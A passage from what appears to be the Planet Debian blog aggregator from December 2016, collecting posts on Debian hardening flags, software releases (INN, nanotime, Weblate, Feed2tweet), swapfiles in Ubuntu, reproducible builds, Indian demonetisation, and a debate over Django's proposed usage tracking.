  • You know how to document each step and are willing to make all codes and adjustments available.

My sponsor offers to send out FP2 devices to (seriously) interested developers and if needed, he can also back up developers financially. If you are interested, please get in touch with me (and I'll channel you through...) via IRC (on the OFTC or Freenode network).

light+love
Mike (aka sunweaver on IRC)

[1] https://www.ut4fp.org/

18 December, 2016 01:40PM by sunweaver

hackergotchi for Bálint Réczey

Bálint Réczey

Hardening Debian Stretch with PIE is ready but bindnow will be missing

Hardening all executables by making them position independent by default is basically ready, with a few packages left to fix (bugs). On the other hand, bindnow is not enabled globally (#835146) and it seems it will not be for the next stable release, despite my plan :-(.

If you are a maintainer you can still have your packages hardened in Stretch by enabling bindnow per package before 25 January, 2017. It could be a nice present for your users!
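For reference, enabling bindnow per package usually amounts to a one-line addition to debian/rules, assuming the package already picks up its build flags from dpkg-buildflags (e.g. via dh):

```makefile
# debian/rules: opt in to bindnow on top of the default hardening flags
export DEB_BUILD_MAINT_OPTIONS = hardening=+bindnow
```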

update: It is nice to see how enabling PIE in GCC increased PIE coverage while bindnow coverage is improving slowly with maintainers enabling it package by package:

lintian-pie

From https://lintian.debian.org/tags/hardening-no-pie.html

lintian-no-bindnow

From: https://lintian.debian.org/tags/hardening-no-bindnow.html

update 2: Changed the deadline of enabling bindnow per package to align with the start of the full freeze, not the soft freeze.

 

18 December, 2016 10:28AM by Réczey Bálint

hackergotchi for Johannes Schauer

Johannes Schauer

Looking for self-hosted filesharing software

The owncloud package was removed from Debian unstable and testing. I am thus now looking for an alternative. Unfortunately, finding such a replacement seems to be harder than I initially thought, even though I only use a very small subset of what owncloud provides. What I require is some software which allows me to:

  1. upload a directory of files of any type to my server (no "distributed" filesharing where I have to stay online with my laptop)
  2. share the content of that directory via HTTP (no requirement to install any additional software other than a web browser)
  3. let the share-links be private (no possibility to infer the location of other shares)
  4. allow users to browse that directory (image thumbnails or a photo gallery would be nice)
  5. allow me to allow anonymous users to upload their own content into that directory (also only requiring their web browser)
  6. already in Debian or easy to package and maintain due to low complexity (I don't have enough time to become the next "owncloud maintainer")

I thought this was a pretty simple task to solve but I am unable to find any software that fits above criteria.

The below table shows the result of my research of what's currently available. The columns mark whether the respective software fulfills one of the six criteria from above.

Software        1  2  3  4  5  6
owncloud
sparkleshare
dvcs-autosync
git annex assistant
syncthing
pydio
seafile
sandstorm.io
ipfs
bozon
droppy

Pydio, seafile and sandstorm.io look promising but they seem to be beasts similar in complexity to owncloud as they bring features like version tracking, office integration, wikis, synchronization across multiple devices or online editing of files which are features that I do not need.

I would already be very happy if there was a script which would make it easy to create a hard-to-guess symlink to a directory with data tracked by git annex under my www-root and then generate some static HTML to provide a thumbnails view or a photo gallery. Unfortunately, even that solution would not be sufficient as it would still disallow public upload by anybody whom I would give the link to...
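The static-HTML wish above is simple enough to sketch. The following is a toy illustration only (the function and its name are made up, and the git annex integration and thumbnailing are omitted): it creates a hard-to-guess symlink under the www-root and writes a minimal file listing.

```python
import html
import os
import secrets

def publish_share(data_dir, www_root):
    """Expose data_dir under www_root via a hard-to-guess symlink and
    write a minimal static index.html listing its files.
    (publish_share is an illustrative name, not an existing tool.)"""
    token = secrets.token_urlsafe(16)            # ~128 bits of randomness
    link = os.path.join(www_root, token)
    os.symlink(os.path.abspath(data_dir), link)  # share URL ends in /<token>/

    items = "".join(
        f'<li><a href="{html.escape(name)}">{html.escape(name)}</a></li>\n'
        for name in sorted(os.listdir(data_dir))
        if name != "index.html"
    )
    with open(os.path.join(data_dir, "index.html"), "w") as f:
        f.write(f"<ul>\n{items}</ul>\n")
    return link
```

Of course, this still leaves criterion 5 (anonymous upload) unanswered, which needs server-side code rather than static HTML.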

If you know some software that meets my criteria or would like to submit corrections to above table, please shoot an email to [email protected]. Thanks!

18 December, 2016 10:18AM

December 17, 2016

hackergotchi for Shirish Agarwal

Shirish Agarwal

Demonetisation, Indian state and world

Queues get longer, patience runs out- Copyright Indian Express Group.


I dunno if people have heard about the demonetisation of the INR 500 and INR 1000 notes which happened in India on 8th November 2016, with new currency of INR 2000 and INR 500 designed in India.

What they did was: from that moment onwards, paper currency of INR 500 and INR 1000 notes was declared invalid except at a few places (Government Hospitals, Petrol Pumps, booking of air and train tickets). The reasons given were –

a. End of corruption – There is/was suspicion that there are people who have loads of unaccounted wealth which they keep in the form of Cash in hand,

b. Charge against fake/duplicate currency – There is/was suspicion that quite a bit of the currency in circulation, especially high-value notes such as INR 500 and INR 1000, is fake; having made these notes illegal, people had to hand over cash to banks, and the fake money would be pushed out of the system.

c. Terror funding – This is related to the above point. There is a popular theory/myth/fact that terrorists use fake money to buy people, arms and ammunition, while further devaluing the INR against the dollar and the basket of other high-value currencies that the Indian currency bases itself on.

Each of these theories/myths/facts has been contested. Every day we are seeing and reading reports of people being caught with new currency in absurd amounts, while the RBI, our central bank and lender of last resort, has had to play multiple roles, such as policing (along with the country's Income Tax Department) as well as pumping new notes of the NEW INR 2000 and INR 500 into ATMs and bank branches around the country.

Now while the above may seem reasonable, there have been multiple factors which have made the whole exercise less effective in its implementation –

a. Banking reach – While India does and can boast of somewhat good indicators of banking reach. But –

A quarter of these accounts were opened only in the last couple of years under the 'Pradhan Mantri Jan Dhan Yojana'.

There are quite a few limitations to such accounts. It is a good scheme though: if you develop a good rapport with the bank and show a good credit/debit understanding, there is the possibility to move to a normal full-fledged bank account.

Almost all of these accounts had zero-balances till the demonetization move.

Many of these accounts are suspected to have been conduits to convert black money to white as the Govt. had said it will not scrutinize small savings bank accounts.

Also, many bank accounts have historically lain dormant over the years. One of my first jobs was as a data entry operator in a bank, and I used to see hundreds of bank accounts lying dormant for years together. This was during bank digitization in the early 90s.

Small savings accounts would not be scrutinized if deposits total up to INR 250,000, while Jan Dhan accounts have an upper limit of only INR 50,000.

Even then, it has led to a huge surge in balances, specifically in zero-balance accounts.

Which begs the question: if it is their hard-earned money, why hadn't they deposited it before 8th November 2016?

While I can't speak for them, I can certainly speak for myself. I have hardly kept more than INR 5–10K in-house for medical emergencies for a number of years.

Unless you are a businessman who has need of cash, or have some function coming up, nobody that I know would keep such amounts at home, simply because of the possibility of theft.

So how did such people, who are not able to open a full-fledged savings account, get access to such large amounts?

In most public sector banks, to have a full-fledged savings account the only requirements are –

a. Have INR 500 to 1000 as balance at all times.
b. Have permanent identity and residential proof
c. Two photographs
d. 2-3 people who are account holders who can act as guarantor.

Of the above, b. and d. are probably sticking points for most migrants, while d. may be a sticking point for labourers, craftsman etc. hence the need for that specific scheme.

Which leads to the natural suspicion that they may have been white-washing somebody's untaxed, unaccounted money, which is being put into the bank and made into legitimate white money.

People do not have to file an Income Tax Return (ITR) unless they earn more than INR 250,000 in a single financial year.

One good off-shoot of the scheme though is the transparency gained about Bank Mitras.

b. Number of banks, quality of Bank services, number of people per bank at least in Nationalized Banks leaves much to be desired. We can’t even try to compare with other BRIC countries, leave alone Germany.

Mobile ATM - Copyright - PTI


One another positive off-shoot has been the introduction of Mobile ATM Vans around the country.

I had seen such vans in Mumbai for ages, but not anywhere else.

I do hope that both Bank Mitras as well as such ‘Mobile ATM Vans’ become more common. There are huge swathes of people who are currently unbanked. Getting them into the banking infrastructure, and getting them to *think* about taking rational financial decisions (saving and spending, different types of saving etc.), should not only make citizens and the banking system more productive and efficient, but hopefully also improve our GDP and make it more resilient to any outside financial shocks.

c. Many bank websites have everything in English. That norm needs to change.

I do have a few queries though. One country that is supposed to be a prominent supporter and user of a 'cashless' society is Canada. Could any Canadians (also because DebConf is going to happen in Canada in 2017) share how and if they have seen the Canadian banking system evolve in their country?

Also, how much of Canada's economy is cashless, i.e. uses Electronic Money Transfer and other means (but not cash), and how much is cash, in day-to-day usage and transactions? I am trying to get people's perspective rather than some website which may serve only raw numbers, although even that would be appreciated.

Also, what charges/commission, if any, are paid to a Canadian bank for paying via card/electronic money transfer? I ask as India has reduced charges overall from 2% to 1% for making transactions up to INR 2000 in a day.

There has also been recent talk of plastic notes instead of paper currency. Plastic notes are supposed to be more copy-proof and also to last much longer. They will not soil as paper notes do.

How have other countries been looking at plastic currencies? I do suspect there would be issues while destroying plastic money vis-a-vis paper currencies.

A sort of interesting discussion that I had with Bernelle before venturing into South Africa was asking her about monetary transactions in SA. She had replied that the highest denomination note was 200 ZAR, which is roughly equal to INR 1000 (ZAR 200 x 5). What is/was interesting is that Bernelle told me to be careful and as far as possible not to show a 200 ZAR note, whereas in India even the cheapest worker I have met has seen and used an INR 1000 note. The context of the discussion was being safe in South Africa and doing transactions with the people around, as to what works.

It would be interesting to know how things work in Canada, for instance.

Also, has Canada or any other country experimented with plastic notes? If yes, how has the experience been?

I would have to say this is in no way a definitive guide to the different impressions and repercussions of the decision and the way it's playing out even now.

Another thing: while researching for the article I came across lots of interesting things, e.g. the Big Mac Index and its limitations, which I didn't know how to integrate into the discussion of the decision and Policy taken. I also came to know that lots of Policy initiatives being taken by the current (NDA) Government are similar to initiatives taken elsewhere in the world.

Whether the Policy will be fruitful in getting the desired outcome or will lead to more chaos and a down-turn, we will know only in the next quarter.

It would be nice and interesting if people have observed something similar in their country’s economic policies as well.


Filed under: Miscellenous Tagged: #Bank Mitra, #Bank reach, #blackmoney, #debconf17, #Demonetisation, #fake currencies, #full-fledged savings account, #Jan Dhan scheme, #Moile ATM Van, #Plastic money, #Public Sector Banks (PSB), #Reserve Bank of India, Big Mac Index

17 December, 2016 09:19PM by shirishag75

Russ Allbery

INN 2.6.1

(As usual, Julien finished this release a bit back, and then I got busy with life stuff and haven't gotten the announcement out.)

This is a bug-fix and minor feature release over INN 2.6.0. The biggest change is adding support for the new COMPRESS extension. It also fixes various bugs around state changes when negotiating various compression or integrity layers and fixes some issues with nnrpd's validation of newly-posted messages. (Messages with Received and Posted headers are no longer rejected; messages with all-whitespace headers now are.) This release also supports OpenSSL 1.1.0 and fixes an nntpsend bug under systemd.

As always, thanks to Julien ÉLIE for preparing this release and doing most of the maintenance work on INN!

You can get the latest version from the official ISC download page or from my personal INN pages. The latter also has links to the full changelog and the other INN documentation.

17 December, 2016 08:42PM

December 16, 2016

Dimitri John Ledkov

Swapfiles by default in Ubuntu

4MB RAM card
By default, in Ubuntu, we usually create a swap partition.

Back in the day of 4MB RAM cards this made total sense, as the ratio of RAM to disk space was still very low. Things have changed since. Server, desktop and embedded systems have migrated to newer generations of both RAM and persistent storage. On the high-performance side of things we see machines with faster storage in the form of NVMe and SSD drives. Reserving space for swap on such storage can be seen as expensive and wasteful. This is also true for recent enough laptops and desktops. Mobile phones have substantial amounts of RAM these days, at times coupled with eMMC storage - flash storage of lower performance, with a limited number of write cycles, which hence should not be overused for volatile swap data. And there are also unicorns in the form of high-performance computing on high-memory (shared-memory) systems with little or no disk space.

Today, carving a partition and reserving twice the RAM size for swap makes little sense. For a common, general, machine most of the time this swap will not be used at all. Or if said swap space is in use but is of inappropriate size, changing it in-place in retrospect is painful.

Starting from the 17.04 Zesty Zapus release, instead of creating swap partitions, swapfiles will be used by default for non-LVM based installations.

Secondly, the sizing of swapfiles is very different. It is no more than 5% of free disk space or 2GiB, whichever is lower.

For preseeding, there are two toggles that control this behavior:
  • d-i partman-swapfile/percentage string 5
  • d-i partman-swapfile/size string 2048
Setting either of those to zero will result in a system without any swap at all. One can tweak the relative limit in integer percentage points and the absolute limit in MiB.
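The sizing rule, together with the zero toggles, can be sketched as follows. This is just a reading of the description above, not the installer's actual code:

```python
def swapfile_size_mib(free_disk_mib, percentage=5, size_cap_mib=2048):
    """Swapfile size: no more than `percentage`% of free disk space or
    `size_cap_mib` MiB, whichever is lower; zero for either toggle
    disables swap entirely (mirrors the two preseed knobs above)."""
    if percentage == 0 or size_cap_mib == 0:
        return 0
    return min(free_disk_mib * percentage // 100, size_cap_mib)

print(swapfile_size_mib(500_000))               # big disk: capped at 2048
print(swapfile_size_mib(20_000))                # small disk: 5% -> 1000
print(swapfile_size_mib(20_000, percentage=0))  # swap disabled -> 0
```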

On LVM based installations, swap logical volumes are used, since unfortunately LVM snapshots do not exclude swapfile changes. However, I would like to move partman-auto to respect the above proposed 5%-or-2GB limits.

Ps. 4MB RAM card picture is by Bub's (Photo) [GFDL or CC-BY-SA-3.0], via Wikimedia Commons

16 December, 2016 11:30AM by Dimitri John Ledkov ([email protected])

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

nanotime 0.0.1: New package for Nanosecond Resolution Time for R

R has excellent tools for dates and times. The Date and POSIXct classes (as well as the 'wide' representation in POSIXlt) are versatile, and a lot of useful tooling has been built around them.

However, POSIXct is implemented as a double counting fractional seconds since the epoch. Given its 53 bits of accuracy, it leaves just a bit less than microsecond resolution, which is good enough for most things.

But more and more performance measurements, latency statistics, ... are now measured more finely, and we need nanosecond resolution. For this, an integer64 is commonly used to represent nanoseconds since the epoch.

And while R does not have a native type for this, the bit64 package by Jens Oehlschlägel offers a performant one, implemented as a lightweight S3 class. So this package uses this integer64 class, along with two helper functions for parsing and formatting at nanosecond resolution, from the RcppCCTZ package which wraps the CCTZ library from Google. CCTZ is a modern C++11 library extending the (C++11-native) chrono type.

Examples

Simple Parsing and Arithmetic

R> x <- nanotime("1970-01-01T00:00:00.000000001+00:00")
R> print(x)
integer64
[1] 1
R> format(x)
[1] "1970-01-01T00:00:00.000000001+00:00"
R> cat("x+1 is: ")
x+1 is: R> x <- x + 1
R> print(x)
integer64
[1] 2
R> format(x)
[1] "1970-01-01T00:00:00.000000002+00:00"
R>

Vectorised

R> options("width"=60)
R> v <- nanotime(Sys.time()) + 1:5
R> v
integer64
[1] 1481505724483583001 1481505724483583002
[3] 1481505724483583003 1481505724483583004
[5] 1481505724483583005
R> format(v)
[1] "2016-12-12T01:22:04.483583001+00:00"
[2] "2016-12-12T01:22:04.483583002+00:00"
[3] "2016-12-12T01:22:04.483583003+00:00"
[4] "2016-12-12T01:22:04.483583004+00:00"
[5] "2016-12-12T01:22:04.483583005+00:00"
R> 

Use with zoo

R> z <- zoo(cbind(A=1:5, B=5:1), v)
R> options("nanotimeFormat"="%d %b %H:%M:%E*S")  ## override default
R> z
                          A B
12 Dec 01:47:55.812513001 1 5
12 Dec 01:47:55.812513002 2 4
12 Dec 01:47:55.812513003 3 3
12 Dec 01:47:55.812513004 4 2
12 Dec 01:47:55.812513005 5 1
R> 

Technical Details

The bit64 package (by Jens Oehlschlägel) supplies the integer64 type used to store the nanosecond resolution time as (positive or negative) offsets to the epoch of January 1, 1970. The RcppCCTZ package supplies the formatting and parsing routines based on the (modern C++) library CCTZ from Google.

Status

Version 0.0.1 has now been released. It works with some other packages, notably zoo and data.table.

It (at least currently) requires RcppCCTZ to parse and format nanosecond-resolution time objects from / to text --- and this package is available on Linux and OS X only due to its use of the system time zoneinfo. The requirement could be relaxed in the future by rewriting the formatting and parsing code. Contributions are welcome.

Installation

The package is not yet on CRAN. Until it gets there, or to install the development versions, it can also be installed via a standard

install.packages("RcppCCTZ")   # need 0.1.0 or later
remotes::install_github("eddelbuettel/nanotime")  

If you prefer install.packages() (as I do), use the version from the ghrr drat:

install.packages("drat")       # easier repo access + creation
drat:::add("ghrr")             # make it known
install.packages("nanotime")   # install it

If and when it gets to CRAN you will be able to do

install.packages("nanotime")

Contact

For questions or comments use the issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

16 December, 2016 11:28AM

hackergotchi for Raphaël Hertzog

Raphaël Hertzog

Freexian’s report about Debian Long Term Support, November 2016

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In November, about 150 work hours have been dispatched among 14 paid contributors. Their reports are available:

Evolution of the situation

The number of sponsored hours did not change this month and in fact we haven’t had any new sponsor since September. We still need a couple of supplementary sponsors to reach our objective of funding the equivalent of a full time position.

The security tracker currently lists 40 packages with a known CVE and the dla-needed.txt file 36. We don't seem to be really catching up with the small backlog. The reasons are not clear, but I noticed that there are a few packages that take a lot of time due to the number of issues found with fuzzers. We also handle many issues that the security team ends up classifying as not worth an update, because we add the package to dla-needed.txt before the security team has done its review and nobody checks afterwards.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

16 December, 2016 09:43AM by Raphaël Hertzog

hackergotchi for Michal Čihař

Michal Čihař

wlc 0.7

wlc 0.7, a command-line utility for Weblate, has just been released. There are several new commands, like translation file download or statistics fetching.

Full list of changes:

  • Added reset operation.
  • Added statistics for projects.
  • Added changes listing.
  • Added file downloads.

wlc is built on the API introduced in Weblate 2.6, which is still in development; you need Weblate 2.10 for some features (already available on our hosting offering). You can find usage examples in the wlc documentation.

Filed under: Debian English phpMyAdmin SUSE Weblate | 2 comments

16 December, 2016 09:15AM

hackergotchi for Steve Kemp

Steve Kemp

A simple Perl alternative to storing data in Redis

I continue to be a big user of Perl, and for many of my sites I avoid the use of MySQL which means that I largely store data in flat files, SQLite databases, or in memory via Redis.

One of my servers was recently struggling with RAM, and the surprising cause was "too much data" in Redis. (Surprising because I'd not been paying attention to how popular it had become, and also because ASCII text compresses pretty well.)

Read/Write speed isn't a real concern, so I figured I'd move the data into an SQLite database, but that would require rewriting the application.

The client library for Perl is pretty awesome, and simple usage looks like this:

# Connect to localhost.
my $r = Redis->new();

# simple storage
$r->set( "key", "value" );

# Work with sets
$r->sadd( "fruits", "orange" );
$r->sadd( "fruits", "apple" );
$r->sadd( "fruits", "blueberry" );
$r->sadd( "fruits", "banannanananananarama" );

# Show the set-count
print "There are " . $r->scard( "fruits" ) . " known fruits";

# Pick a random one
print "Here is a random one " . $r->srandmember( "fruits" ) . "\n";

I figured that, if I ignored the Lua support and the other more complex operations, creating a compatible API implementation wouldn't be too hard. So rather than porting my application to use SQLite directly, I could just use a different client library.

In short I change this:

use Redis;
my $r = Redis->new();

To this:

use Redis::SQLite;
my $r = Redis::SQLite->new();

And everything continues to work. I've implemented all the set-related functions except one, and a random smattering of the other simple operations.

The appropriate test-cases in the Redis client library (i.e. removing all references to things I didn't implement) pass, and my own new tests also make me confident.

It's obviously not a hard job, but it was a quick solution to a real problem and might be useful to others.

My image hosting site, and my markdown sharing site now both use this wrapper and seem to be performing well - but with more free RAM.

No doubt I'll add more of the simple primitives as time goes on, but so far I've done enough to be useful.

16 December, 2016 06:42AM

December 15, 2016

Reproducible builds folks

Reproducible Builds: week 85 in Stretch cycle

What happened in the Reproducible Builds effort between Sunday December 4 and Saturday December 10 2016:

Toolchain development and fixes

Anders Kaseorg opened a pull request to asciidoc upstream, to make it generate reproducible documentation. (#782294)

Bugs filed

Chris Lamb:

Clint Adams:

Dafydd Harries:

Robbie Harwood:

Valerie R Young:

Reviews of unreproducible packages

47 package reviews have been added, 84 have been updated and 3 have been removed in this week, adding to our knowledge about identified issues.

1 new issue type has been added: lessc_captures_build_path

Weekly QA work

During our reproducibility testing, some FTBFS bugs have been detected and reported by:

  • Chris Lamb (8)

diffoscope development

Chris Lamb fixed a division-by-zero in the progress bar, split out trydiffoscope into a separate package, and made some performance enhancements. Maria Glukhova fixed build issues with Python 3.4.

strip-nondeterminism development

Anders Kaseorg added support for .par files, by allowing them to be treated as Zip archives; and Chris Lamb improved some documentation.

reprotest development

Ximin Luo added the ability to vary the build time using faketime, as well as other code quality improvements and cleanups.

He also discovered a little-known fact about faketime - that it also modifies filesystem timestamps by default. He submitted a PR to libfaketime upstream to improve the documentation on this, which was quickly accepted, and also disabled this feature in reprotest's own usage of faketime.

buildinfo.debian.net development

There was further work on buildinfo.debian.net code. Chris Lamb added support for buildinfo format 0.2 and made rejection notices clearer; and Emanuel Bronshtein fixed some links to use HTTPS.

Misc.

This week's edition was written by Ximin Luo and reviewed by a bunch of Reproducible Builds folks on IRC and via email.

15 December, 2016 02:35PM

Jamie McClelland

Should we be pushing OpenPGP?

Bjarni Rúnar, the author of Mailpile released a blog about recent blogs disparaging OpenPGP. It's a good read.

There's one reason to support OpenPGP missing from the blog: OpenPGP protects you if your mail server is hacked. I'm sure that Debbie Wasserman Schultz wishes she had been using OpenPGP.

Having said all of this... OpenPGP didn't make my recent list of security tips. That omission is for two reasons:

  • I've never trusted my phone enough to store my OpenPGP keys on it. However, now that I am encrypting my data partition on the phone, should I re-consider? I use the K-9 email client, which has had OpenPGP support for years; should I recommend that other people use K-9 and upload their keys to their phones? Suggesting that people use OpenPGP without the ability to use it on their phones seems like an empty suggestion. What about OpenPGP on the iPhone?
  • I'm waiting for Mailpile 1.0 to be released so I have a viable suggestion for how people can start using encryption now on their desktops. The complexity of using Thunderbird with Enigmail (and the uncertain future of Thunderbird) makes it a hard sell. Should I re-consider? What about Mailvelope? Should I be encouraging people to use Mailvelope with their Gmail, etc. accounts?

15 December, 2016 01:56PM

hackergotchi for Michal Čihař

Michal Čihař

Weblate 2.10

Right on schedule, Weblate 2.10 is out today. This release brings a Git exporter module, improves support for machine-translation services, and adds various CSV exports and API interfaces.

Full list of changes:

  • Added quality check to check whether plurals are translated differently.
  • Fixed GitHub hooks for repositories with authentication.
  • Added optional Git exporter module.
  • Support for Microsoft Cognitive Services Translator API.
  • Simplified project and component user interface.
  • Added automatic fix to remove control chars.
  • Added per language overview to project.
  • Added support for CSV export.
  • Added CSV download for stats.
  • Added matrix view for a quick overview of all translations.
  • Added basic API for changes and units.
  • Added support for Apertium APy server for machine translations.

If you are upgrading from an older version, please follow our upgrading instructions.

You can find more information about Weblate on https://weblate.org, and the code is hosted on GitHub. If you are curious how it looks, you can try it out on the demo server; you can log in there with the demo account using the demo password, or register your own user. Weblate is also being used on https://hosted.weblate.org/ as the official translating service for phpMyAdmin, OsmAnd, Aptoide, FreedomBox, Weblate itself and many other projects.

Should you be looking for hosting of translations for your project, I'm happy to host them for you or help with setting it up on your infrastructure.

Further development of Weblate would not be possible without people providing donations; thanks to everybody who has helped so far! The roadmap for the next release is being prepared; you can influence it by expressing support for individual issues, either in comments or by providing a bounty for them.

Filed under: Debian English phpMyAdmin SUSE Weblate | 0 comments

15 December, 2016 01:30PM

December 14, 2016

Carl Chenet

Feed2tweet 0.8, tool to post RSS feeds to Twitter, released

Feed2tweet 0.8, a self-hosted Python app to automatically post RSS feeds to the Twitter social network, was released on December 14th.

With this release, Feed2tweet now manages hashtags smartly, adding as many as possible given the size limit of the tweet.
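
The behaviour could look roughly like the following sketch (illustrative only, not Feed2tweet's actual code; it assumes the 140-character limit Twitter enforced at the time):

```python
def fit_hashtags(text, hashtags, limit=140):
    """Append as many hashtags as fit within the tweet-length limit."""
    tweet = text
    for tag in hashtags:
        candidate = tweet + " #" + tag
        if len(candidate) > limit:
            break  # this tag (and any later, by this greedy rule) is dropped
        tweet = candidate
    return tweet

print(fit_hashtags("New blog post about Debian", ["debian", "linux", "foss"]))
# -> New blog post about Debian #debian #linux #foss
```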

Two new options are also available:

  • --populate-cache to retrieve the last entries of the RSS feeds and store them in the local cache file without posting them to Twitter
  • --rss-sections to display the available sections in the RSS feed, allowing you to use these section names in your tweet format (see the official documentation for more details)

Feed2tweet 0.8 is already in production for Le Journal du hacker, a French-speaking Hacker News-like website; LinuxJobs.fr, a French-speaking job board; and this very blog.


What’s the purpose of Feed2tweet?

Some online services offer to convert your RSS entries into Twitter posts. These services are usually unreliable, slow, and don't respect your privacy. Feed2tweet is a self-hosted Python app; the source code is easy to read, and the official documentation is available online with lots of examples.

Twitter Out Of The Browser

Have a look at my GitHub account for my other Twitter automation tools:

  • Retweet: retweets all tweets (or a filtered subset) from one Twitter account to another to spread content.
  • db2twitter: gets data from a SQL database (several are supported), builds tweets and sends them to Twitter.
  • Twitterwatch: monitors the activity of your Twitter timeline and warns you if no new tweets appear.

What about you? Do you use tools to automate the management of your Twitter account? Feel free to give me feedback in the comments below.

14 December, 2016 11:00PM by Carl Chenet

Antoine Beaupré

Django debates privacy concern

In recent years, privacy issues have become a growing concern among free-software projects and users. As more and more software tasks become web-based, surveillance and tracking of users is also on the rise. While some software may use advertising as a source of revenue, which has the side effect of monitoring users, the Django community recently got into an interesting debate surrounding a proposal to add user tracking—actually developer tracking—to the popular Python web framework.

Tracking for funding

A novel aspect of this debate is that the initiative comes from concerns of the Django Software Foundation (DSF) about funding. The proposal suggests that "relying on the free labor of volunteers is ineffective, unfair, and risky" and states that "the future of Django depends on our ability to fund its development". In fact, the DSF recently hired an engineer to help oversee Django's development, which has been quite successful in helping the project make timely releases with fewer bugs. Various fundraising efforts have resulted in major new Django features, but it is difficult to attract sponsors without some hard data on the usage of Django.

The proposed feature tries to count the number of "unique developers" and gather some metrics of their environments by using Google Analytics (GA) in Django. The actual proposal (DEP 8) is done as a pull request, which is part of Django Enhancement Proposal (DEP) process that is similar in spirit to the Python Enhancement Proposal (PEP) process. DEP 8 was brought forward by a longtime Django developer, Jacob Kaplan-Moss.

The rationale is that "if we had clear data on the extent of Django's usage, it would be much easier to approach organizations for funding". The proposal is essentially about adding code in Django to send a certain set of metrics when "developer" commands are run. The system would be "opt-out", enabled by default unless turned off, although the developer would be warned the first time the phone-home system is used. The proposal notes that an opt-in system "severely undercounts" and is therefore not considered "substantially better than a community survey" that the DSF is already doing.

Information gathered

The pieces of information reported are specifically designed to run only in a developer's environment and not in production. The metrics identified are, at the time of writing:

  • an event category (the developer commands: startproject, startapp, runserver)
  • the HTTP User-Agent string identifying the Django, Python, and OS versions
  • a user-specific unique identifier (a UUID generated on first run)
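
A minimal sketch of that last mechanism (hypothetical file name and code, not the actual DEP 8 implementation): persist a random UUID on first run and reuse it on every subsequent run:

```python
import uuid
from pathlib import Path

def get_install_id(state_file):
    """Return a stable per-user identifier, creating it on first run."""
    state_file = Path(state_file)
    if state_file.exists():
        return state_file.read_text().strip()
    new_id = str(uuid.uuid4())  # random, not derived from any personal data
    state_file.write_text(new_id)
    return new_id
```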

The proposal mentions the use of the GA aip flag which, according to GA documentation, makes "the IP address of the sender 'anonymized'". It is not quite clear how that is done at Google and, given that it is a proprietary platform, there is no way to verify that claim. The proposal says it means that "we can't see, and Google Analytics doesn't store, your actual IP". But that is not actually what Google does: GA stores IP addresses, the documentation just says they are anonymized, without explaining how.
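
Google has elsewhere described this "anonymization" as zeroing the trailing bits of the address (the last octet for IPv4). A sketch of that scheme, based on that description rather than on anything verifiable in GA itself, shows how little such masking hides:

```python
import ipaddress

def mask_ip(addr):
    """Zero the last octet of an IPv4 address (a /24 mask), the kind of
    'anonymization' described for the aip flag. The result still pins
    the sender to a block of at most 256 addresses."""
    net = ipaddress.ip_network(addr + "/24", strict=False)
    return str(net.network_address)

print(mask_ip("203.0.113.42"))  # -> 203.0.113.0
```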

GA is presented as a trade-off, since "Google's track record indicates that they don't value privacy nearly as high" as the DSF does. The alternative, deploying its own analytics software, was presented as making sustainability problems worse. According to the proposal, Google "can't track Django users. [...] The only thing Google could do would be to lie about anonymizing IP addresses, and attempt to match users based on their IPs".

The truth is that we don't actually know what Google means when it "anonymizes" data: Jannis Leidel, a Django team member, commented that "Google has previously been subjected to secret US court orders and was required to collaborate in mass surveillance conducted by US intelligence services" that limit even Google's capacity of ensuring its users' anonymity. Leidel also argued that the legal framework of the US may not apply elsewhere in the world: "for example the strict German (and by extension EU) privacy laws would exclude the automatic opt-in as a lawful option".

Furthermore, the proposal claims that "if we discovered Google was lying about this, we'd obviously stop using them immediately", but it is unclear exactly how this could be implemented if the software was already deployed. There are also concerns that an implementation could block normal operation, especially in countries (like China) where Google itself may be blocked. Finally, some expressed concerns that the information could constitute a security problem, since it would unduly expose the version number of Django that is running.

In other projects

Django is certainly not the first project to consider implementing analytics to get more information about its users. The proposal is largely inspired by a similar system implemented by the OS X Homebrew package manager, which has its own opt-out analytics.

Other projects embed GA code directly in their web pages. This is apparently the option chosen by the Oscar Django-based ecommerce solution, but that was seen by the DSF as less useful since it would count Django administrators and wasn't seen as useful as counting developers. Wagtail, a Django-based content-management system, was incorrectly identified as using GA directly, as well. It actually uses referrer information to identify installed domains through the version updates checks, with opt-out. Wagtail didn't use GA because the project wanted only minimal data and it was worried about users' reactions.

NPM, the JavaScript package manager, also considered similar tracking extensions. Laurie Voss, the co-founder of NPM, said it decided to completely avoid phoning home, because "users would absolutely hate it". But NPM users are constantly downloading packages to rebuild applications from scratch, so it has more complete usage metrics, which are aggregated and available via a public API. NPM users seem to find this is a "reasonable utility/privacy trade". Some NPM packages do phone home and have seen "very mixed" feedback from users, Voss said.

Eric Holscher, co-founder of Read the Docs, said the project is considering using Sentry for centralized reporting, which is a different idea, but interesting considering Sentry is fully open source. So even though it is a commercial service (as opposed to the closed-source Google Analytics), it may be possible to verify any anonymity claims.

Debian's response

Since Django is shipped with Debian, one concern was the reaction of the distribution to the change. Indeed, "major distros' positions would be very important for public reception" to the feature, another developer stated.

One of the current maintainers of Django in Debian, Raphaël Hertzog, explicitly stated from the start that such a system would "likely be disabled by default in Debian". There were two short discussions on Debian mailing lists where the overall consensus seemed to be that any opt-out tracking code was undesirable in Debian, especially if it was aimed at Google servers.

I have done some research to see what, exactly, was acceptable as a phone-home system in the Debian community. My research has revealed ten distinct bug reports against packages that would unexpectedly connect to the network, most of which were not directly about collecting statistics but more often about checking for new versions. In most cases I found, the feature was disabled. In the case of version checks, it seems right for Debian to disable the feature, because the package cannot upgrade itself: that task is delegated to the package manager. One of those issues was the infamous "OK Google" voice activation binary blob controversy that was previously reported here and has since then been fixed (although other issues remain in Chromium).

I have also found out that there is no clearly defined policy in Debian regarding tracking software. What I have found, however, is that there seems to be a strong consensus in Debian that any tracking is unacceptable. This is, for example, an extract of a policy that was drafted (but never formally adopted) by Ian Jackson, a longtime Debian developer:

Software in Debian should not communicate over the network except: in order to, and as necessary to, perform their function[...]; or for other purposes with explicit permission from the user.

